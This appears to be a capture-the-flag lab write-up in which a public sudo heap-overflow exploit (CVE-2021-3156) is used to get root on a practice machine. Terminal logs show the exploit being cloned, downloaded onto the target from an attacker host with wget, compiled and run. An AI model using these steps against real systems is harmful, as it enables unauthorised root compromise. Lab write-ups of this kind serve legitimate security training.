CVE-2021-3156
PEAS has identified that the target system is vulnerable to CVE-2021-3156
A vulnerability was found in sudo up to 1.8.31p2/1.9.5p1 (Operating System Utility Software). It has been rated as critical. This issue affects the function sudoers_policy_main. The manipulation with an unknown input leads to a heap-based overflow vulnerability. Using CWE to declare the problem leads to CWE-122. A heap overflow condition is a buffer overflow, where the buffer that can be overwritten is allocated in the heap portion of memory, generally meaning that the buffer was allocated using a routine such as malloc(). Impacted is confidentiality, integrity, and availability.
Exploit
Exploit found online
┌──(kali㉿kali)-[~/archive/thm/ultratech]
└─$ git clone https://github.com/blasty/CVE-2021-3156 ; tar -czf CVE-2021-3156.tar.gz CVE-2021-3156
Cloning into 'CVE-2021-3156'...
remote: Enumerating objects: 50, done.
remote: Counting objects: 100% (50/50), done.
remote: Compressing objects: 100% (35/35), done.
remote: Total 50 (delta 25), reused 38 (delta 15), pack-reused 0
Receiving objects: 100% (50/50), 8.98 KiB | 707.00 KiB/s, done.
Resolving deltas: 100% (25/25), done.Downloading the exploit package to Kali
Exploitation
www@ultratech-prod:/dev/shm$ wget http://10.9.1.180/CVE-2021-3156.tar.gz ; tar -xf CVE-2021-3156.tar.gz ; cd CVE-2021-3156
--2024-07-22 17:59:54-- http://10.9.1.180/CVE-2021-3156.tar.gz
Connecting to 10.9.1.180:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 25764 (25K) [application/gzip]
Saving to: ‘CVE-2021-3156.tar.gz’
CVE-2021-3156.tar.gz 100%[=============================================================>] 25.16K --.-KB/s in 0.03s
2024-07-22 17:59:54 (758 KB/s) - ‘CVE-2021-3156.tar.gz’ saved [25764/25764]Delivery complete
www@ultratech-prod:/dev/shm/CVE-2021-3156$ make
rm -rf libnss_X
mkdir libnss_X
gcc -std=c99 -o sudo-hax-me-a-sandwich hax.c
gcc -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.cCompiling locally
www@ultratech-prod:/dev/shm/CVE-2021-3156$ ./sudo-hax-me-a-sandwich 1
** CVE-2021-3156 PoC by blasty <peter@haxx.in>
using target: Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31 ['/usr/bin/sudoedit'] (56, 54, 63, 212)
** pray for your rootshell.. **
[+] bl1ng bl1ng! We got it!
# whoami
root
# hostname
ultratech-prod
# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc fq_codel state UP group default qlen 1000
link/ether 02:1c:21:b7:f9:bf brd ff:ff:ff:ff:ff:ff
inet 10.10.57.71/16 brd 10.10.255.255 scope global dynamic eth0
valid_lft 2347sec preferred_lft 2347sec
inet6 fe80::1c:21ff:feb7:f9bf/64 scope link
valid_lft forever preferred_lft forever
3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 02:42:92:e3:60:06 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
inet6 fe80::42:92ff:fee3:6006/64 scope link
valid_lft forever preferred_lft foreverSystem Level Compromise